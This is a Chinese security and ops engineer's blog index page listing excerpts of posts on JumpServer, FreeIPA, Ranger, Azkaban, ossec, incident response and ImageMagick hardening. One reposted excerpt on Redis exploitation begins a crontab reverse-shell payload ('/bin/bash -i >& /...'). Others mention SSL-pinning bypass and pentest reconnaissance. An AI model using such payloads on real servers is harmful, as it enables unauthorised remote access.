自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(71)
  • 论坛 (1)

原创 jumpserver批量执行命令报Error occur: SoftTimeLimitExceeded解决方法

参考https://github.com/jumpserver/jumpserver/issues/3813修改/opt/jumpserver/apps/ops/tasks.py文件,找到@shared_task(soft_time_limit=60, queue="ansible")def run_command_execution(cid, **kwargs): ......这部分,修改soft_time_limit后面的值,单位是s...

2020-09-21 16:57:49 12

原创 开源风控系统radar部署

简介radar是一款2019年发版的开源风控系统。项目官网http://radar.pgmmer.top目前在码云上(https://gitee.com/freshday/radar)有1.2k的stargithub上(https://github.com/wfh45678/radar )有500+的star起因目前已经发布到1.04版,官方的部署文档https://gitee.com/freshday/radar/wikis/manual?sort_id=163744...

2020-08-21 20:26:29 77

转载 【转载】一个人的安全部系列

注:一个人的安全部主要问题在于人力资源的不足,甚至当只有一个人力预算的情况下,安全预算可能严重不足的,但是该有的东西还是不能少,只是实现上偏简单粗暴一些,转两篇文章记录一下,作者写的很详细,方便自己查漏补缺一个人的安全部之企业信息安全建设规划一个人的安全部之大话企业数据安全保护...

2020-07-15 19:45:25 76

转载 【转载】FreeIPA中间CA证书已过期

转载自https://www.kutu66.com//hulianwang/article_188064问题:我们有2个FreeIPA服务器在网络中运行,今天我们发现:https://support.sectigo.com/articles/Knowledge/Sectigo-AddTrust-External-CA-Root-Expiring-May-30-2020中间CA已过期,我们无法连接到LDAP。日志中有以下错误:ipa: INFO: 401 Unauthorized: [

2020-07-06 14:59:51 219

转载 grafana权限管理

注:企业中往往有各种各样的应用系统,对于安全来说只要可能涉及到敏感数据的系统都要了解权限管理,这篇文章介绍grafana的权限管理比较详细,所以转一下,访问可能需要梯子https://medium.com/@maiccaejfeng/grafana-user-%E7%9A%84%E6%AC%8A%E9%99%90%E7%AE%A1%E7%90%86%E4%BB%A5%E5%8F%8A-dashboard-%E7%9A%84%E6%AC%8A%E9%99%90%E7%AE%A1%E7%90%86-d5c5

2020-07-04 15:59:31 220

转载 【转载】绕过ssl pining使用burp抓包微信小程序

参考了https://xz.aliyun.com/t/6102不过文章里是用的windows,我是用的mac模拟器因为Genymotion是付费的,所以我选择了网易mumu,关于网易mumu如何使用adb连接以及配置代理可参考http://mumu.163.com/help/func/20190129/30131_797867.htmlmac安装adb 参考https://www.jianshu.com/p/69ba21b2996c安装frida的话直接执行pip install fr.

2020-06-19 19:51:10 316

转载 Nginx编译安装lua-nginx-module

注:转载自https://www.cnblogs.com/52fhy/p/10164553.htmllua-nginx-module模块可以将Lua的强大功能嵌入NGINX服务器。下载Nginx源码如果已安装Nginx,需要查看当前安装版本的编译参数:$ /usr/local/nginx/sbin/nginx -V nginx version: nginx/1.12.2 built by gcc 4.4.7 20120313 (Red Hat 4.4.7-18) (GCC) built .

2020-06-17 12:59:38 136

转载 【转载】敏感词过滤实现-DFA

前段时间需要搞一个基于敏感词过滤的脚本,最早搞过一个遍历关键词的,普通的用一下还行,像敏感词词库动不动上万的词库,这样效率太多了,网上搜了一下,找到这么一篇文章python实现敏感词过滤的几种方法最后选用了里面的DFA算法,这里记录一下...

2020-05-30 10:48:22 282

原创 hive开启ranger鉴权后set报错的解决方案(阿里云)

阿里云emr集群hive开启ranger后执行set时报错“java.lang.IllegalArgumentException: Cannot modify mapred.job.queue.name at runtime. It is not in list of params that are allowed to be modified at runtime”网上搜这个报错搜到华为云的一篇文章https://support.huaweicloud.com/trouble-mrs/mrs_03

2020-05-19 13:41:06 314

原创 ranger对接ldap过程中遇到的一个坑

修改usersync的install.properties文件后,执行setup.shsetup.py文件存在一个bug,会修改hadoop-conf/core-site.xml文件权限及属主,导致服务不可用。(详见http://issues.apache.org/jira/browse/RANGER-2671)解决方法也比较简单:执行setup.sh前先将{usersync}/...

2020-04-17 21:01:55 186

原创 freeipa证书相关的一些命令

ipa-getcert list #查看全部证书ipa-cacert-manage renew #更新证书ipa-getcert resubmit -i cert_nickname #cert_nickname自行替换,可由ipa-getcert list 命令获取到,结合自带的certmonger服务可以更新证书过期时间最后吐槽下freeipa的证书是个大坑,默认CA是...

2020-04-12 23:45:44 322 2

原创 freeipa一次启动失败的解决

重启机器后freeipa启动失败执行ipactl start发现连接389端口time out但是对应的ldap服务是开机启动的,服务状态也正常,看了下389是监听在ipv6的,看起来是默认配置不支持ipv6导致于是执行以下命令sysctl net.ipv6.conf.all.disable_ipv6=0sysctl net.ipv6.conf.lo.disable_ipv6=...

2020-04-12 23:30:04 152

原创 对某大型企业的一次web漏洞挖掘过程

前段时间利用周末时间对某大厂做了一次web安全检测,已经很久没搞,但是自己近几年没有脱离业务,并且对业务的理解有进一步的加深,反而可以挖到按以前的思路可能挖不到的漏洞,所以将大概的思考过程记录下来,因为是有稿费的,所以这里只贴上链接吧对某大型企业的一次web漏洞挖掘过程...

2020-04-12 18:09:32 185

原创 kerberos常见错误及解决方法

oracle总结的还是比较全面的https://docs.oracle.com/cd/E26926_01/html/E25889/trouble-2.html

2020-04-12 18:04:03 187

原创 渗透中寻找突破口的那些事

注:之前发在乌云drops的一篇文章,汇总了自己对渗透测试中寻找突破口的一些总结,现在乌云drops没有了,所以发在自己blog上。一、寻找目标在自己日常检测中以及观察他人检测思路发现前期收集信息具有很关键的作用,很多时候不需要对某种漏洞有很深的研究,如果前期收集了足够多的目标,只需要检测一些常见的高危漏洞即可有收获常用思路1.网段信息1)通过子域名如果存在域传送这种...

2020-03-15 22:21:57 597 1

原创 hue连mysql查询条件包含中文时报错'latin-1' codec can't encode

这个问题找了好久,开始按网上的一些做法尝试在hue.ini中添加options={"init_command":"set names utf8;SET CHARACTER SET utf8;SET character_set_connection=utf8;"}但是重启hue后仍然没效果,最后搜到了一篇文章https://blog.csdn.net/supperman_009/artic...

2020-01-09 17:49:28 92

原创 系统中多个python版本通过pip安装方法

python2.7 -m pip install xxx #python2.7替换为需要pip安装的版本

2019-07-31 18:26:40 1459 1

原创 使用reptyr在screen中接管执行中进程

reptyr下载地址https://www.ostechnix.com/reptyr-move-running-process-new-terminal/当你开启了一个占用很长时间的进程,比如wget一个大文件,但是没有在screen等这种环境里打开,又不想占着一个窗口一直等待或者担心ssh中断导致进程退出,就可以使用reptyr了,使用方法也很简单,开启一个screen,在screen中执行...

2019-02-20 11:23:23 695

原创 ssh配置免密登录失败的几种情况

1.最常见的,权限问题,.ssh目前权限要为700,authorized_keys权限要6002.部分操作系统里新创建的用户默认是锁定的,这种情况下认证失败在/var/log/secure中会看到如下错误Nov 21 11:04:26 host-xxxxx sshd[14011]: User test not allowed because account is lockedNov 21...

2018-11-21 11:29:00 4340

转载 【转】azkaban的部署过程中遇到的一些坑(部署篇)

转载自  https://my.oschina.net/u/2988360/blog/1537561注:azkaban之前有个配置文件默认要求6G以上可用内存的坑,解决完之后今天又遇到了代码写死3G以上内存的坑,根据报错信息正巧搜到了这篇文章,另外作者的主页https://my.oschina.net/u/2988360里也有其他几篇关于azkaban的文章,推荐1.azkaban源码下载...

2018-11-12 19:07:18 706

转载 【转】redis利用姿势收集

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;测试环境:CentOS,RHEL# 利用crontab反弹shellredis-cli flushall echo -e "\n\n*/1 * * * * /bin/bash -i >& /...

2018-10-25 21:16:51 302

原创 imagemaick的ghostscript RCE漏洞修复

漏洞信息可以参考imagemaick的ghost script RCE漏洞目前最全的修复方案参考https://www.kb.cert.org/vuls/id/332928编辑ImageMagick的policy文件,默认路径为/etc/ImageMagick/policy.xml在<policymap>标签中增加如下内容 <policy domain="co...

2018-08-24 14:20:39 437

原创 chrome另存为图片无响应解决方法

只要另存为图片浏览器就卡死,尝试重装chrome,清除缓存等仍然无效,最后参考http://tieba.baidu.com/p/2403437252先切换为系统自带的输入法在另存为图片,果然可以了,贴吧里面说的原因是“输入法的状态栏与chrome浏览器的另存为窗口冲突 可能是大家都在抢显示在最前面 ”,设置下输入法状态栏,改成嵌入式的,不用切换也好了,这里记录下...

2018-08-19 11:26:48 8811 1

原创 mysql中执行show full processlist命令条数过多显示不全问题的解决

其实很简单,show full processlist或者show processlist的结果都是从information_schema.processlist表取的结果,直接去查这个表就行了,还可以用sql按条件查询,更方便展示...

2018-04-25 15:05:56 3860

原创 推荐一个在线时序图网站

https://www.websequencediagrams.com/支持文字语法直接生成时序图比如自带的示例:title Authentication SequenceAlice->Bob: Authentication Requestnote right of Bob: Bob thinks about itBob->Alice: Authentication Response生...

2018-04-25 15:02:37 6188 1

原创 ossec集成自定义脚本

在使用ossec之前我们这边零零散散的写了几个安全功能的脚本,放在机器上要一直监控进程是不是存在,使用ossec后,可以通过在客户端的ossec.conf中增加如下内容 full_command /usr/bin/python xxx.py 10 其中frequency可以指定执行间隔时间,这里我设置的是10秒执行一次

2017-11-07 10:51:55 742

原创 auditd配置num_logs不生效解决方法

配置auditd的num_logs值为5,但是发现并不生效,初始配置大概是这样log_file = /xxx/xxx.loglog_format = RAWlog_group = rootpriority_boost = 4flush = INCREMENTALfreq = 20num_logs = 5disp_qos = lossydispatcher = /sbin/aud

2017-11-02 18:31:21 459

原创 ossec启动报ossec-remoted(1206): ERROR: Unable to Bind port错误解决方法

今天部署ossec,启动时ossec-remoted一直都无法启动,日志出现如下错误2017/10/20 16:43:53 ossec-remoted: INFO: Started (pid: 2699).2017/10/20 16:43:53 getaddrinfo: Name or service not known2017/10/20 16:43:53 ossec-remoted(1

2017-10-20 19:05:01 1520

原创 ssh连接失败自动重连脚本

一个简单的小脚本,有些任务需要ssh连接,如果失败的话可以自动不断重连直至成功#!/bin/bashwhile [ 0 -eq 0 ]do ssh $@ if [ $? -eq 0 ]; then break; else sleep 2 fidone使用也比较简单,保存为ssh.sh 执行sh ssh.sh user@

2017-10-18 14:32:33 2014

原创 azkaban任务延迟执行问题跟进

结论:在azkaban配置时如果filter有MinimumFreeMemory,会选择可用内存大于6GB的executor去执行任务,如所有的executor可用内存都不足6GB时则会分配executor失败,导致任务无法执行,一直到内存重新回到大于6GB分配executor成功,任务才会执行。分析过程:第一次出现问题是在8月4号,当时看了下日志,发现如下内容[ExecutorM

2017-08-23 15:49:25 4545 3

转载 又一篇azkaban源码分析

转载至http://www.ivanopt.com/deep-research-source-code-azkaban/本篇文章研究azkaban 调度器以下几个问题:1. Executor 和 Web Server 是如何交互的。2. Executor 的扩展是如何实现的。3. Executor 是如何执行即时任务的。我们从用户提交工作流作为入口,研究一下azka

2017-08-21 00:08:45 2385

转载 【转载】Azkaban源码分析

转载自http://www.acyouzi.com/2017/06/15/azkaban/简介因为 azkaban 功能比较简单,所以在实际使用中存在一些需求用对 azkaban 进行定制,比如:跨 Flow 依赖在 job 执行失败时短信报警Flow 的 start node 可能需要检测满足一定条件再触发(时间,数据是否就绪)可能需要设置 job 优先级,在集群

2017-08-20 20:50:12 3000

原创 当自动化安装遇到ncurse界面的解决方法(取消交互的通用方法)

要实现某个程序的自动化安装,但是在apt-get的时候就会遇到ncurse界面的交互在这里纠结了一会,最后在https://serverfault.com/questions/227190/how-do-i-ask-apt-get-to-skip-any-interactive-post-install-configuration-steps 找到了解决方案,执行DEBIAN_FR

2017-07-07 16:30:06 324

原创 安全应急方法-发现后门文件

主要指非web类后门,web类后门可参考一中的4及后面部分       1)记录文件stat信息,备份文件并删除       2)通过netstat -anltp命令可查看到当前连接信息及建立连接的进程pid,kill掉可疑连接的进程,且已知进程pid可以执行ls -al /proc/pid值 通过exe对应位置找到后门文件路径       3)通过ps aux命令检查是否存在其他可疑

2017-03-27 17:42:04 2982

原创 安全应急方法-站点页面被篡改

把自己工作中积累的一些经验写出来,希望对大家有帮助 1)找到被篡改页面,stat文件记录更改时间及用户等信息 2)将被篡改页面拷贝至其他非web目录,恢复正常页面 3)查看页面被篡改时间的accesslog,找出后门文件及操作ip(可能有多个ip访问后门,需要全部记录,重点记录第一个访问ip) 4)stat后门文件记录时间及操作用户等...

2017-03-27 17:39:14 2636 1

原创 nginx多条件判断

今天一个运维群里有人发了个需求“在nginx怎么拒绝这样的连接1 请求的目标是 / 请求的方法是 POST2 $http_user_agent  是Mozilla/5.0”我给出的方法如下:set $flag 0;if ($http_user_agent = Mozilla/5\.0\.) { set $flag "${flag}1";}location =

2017-03-20 18:43:11 1329

转载 centos安装freeipa

https://www.globo.tech/learning-center/install-freeipa-centos-7/   文章说的是centos7,不过亲测centos6.6可安装,缺点是版本比较低,3.0.0的版本,有个证书两年到期的坑,证书到期的话可参考http://www.freeipa.org/page/IPA_2x_Certificate_Renewal

2017-03-14 19:10:32 2206

原创 linux根据uid反查用户名

auditd的日志只记录用户uid而不会显示对应用户名,看起来不是很友好,于是需要根据uid反查出用户名,但是有些用户是在ldap上的,因此也不能通过/etc/passwd来查,咨询了一下全栈工程师root,给了一条命令getent passwd uid查了一下果然可以,这里记录下,比如查询uid为33的用户名执行getent passwd 33返回如下结果www-data

2016-12-13 19:18:30 8497

原创 linux不用符号实现写文件

今天群里dark牛提出了一个场景,linux下不使用重定向或管道符如何实现写文件,机器不能外联,排除了wget -O  curl -o等方法,非交互环境,排除了vim直接写文件,他当时想了一个写到log里然后mv的思路,但是有不少噪音,算不上完美,后来小伟哥提出一个用nohup实现的方法,这里记录一下dark牛也提出了一个先用dd创建一个非空文件然后sed替换的思路

2016-12-09 19:23:10 555

原创 https站点调用百度地图api

一般加载百度地图api的地址为http://api.map.baidu.com/api?v=2.0&ak=ZUO**************AbM这种,里面的涉及的其他资源url也都全部写死为http了,这样导致的问题就是完全没法用,看了下相关文档,找到这个页面http://lbsyun.baidu.com/index.php?title=jspopular/guide/introduction#

2016-08-15 12:06:35 14918

空空如也

关于防止伪造邮件的问题

发表于 2013-09-26 最后回复 2019-06-02

空空如也
提示
确定要删除当前文章?
取消 删除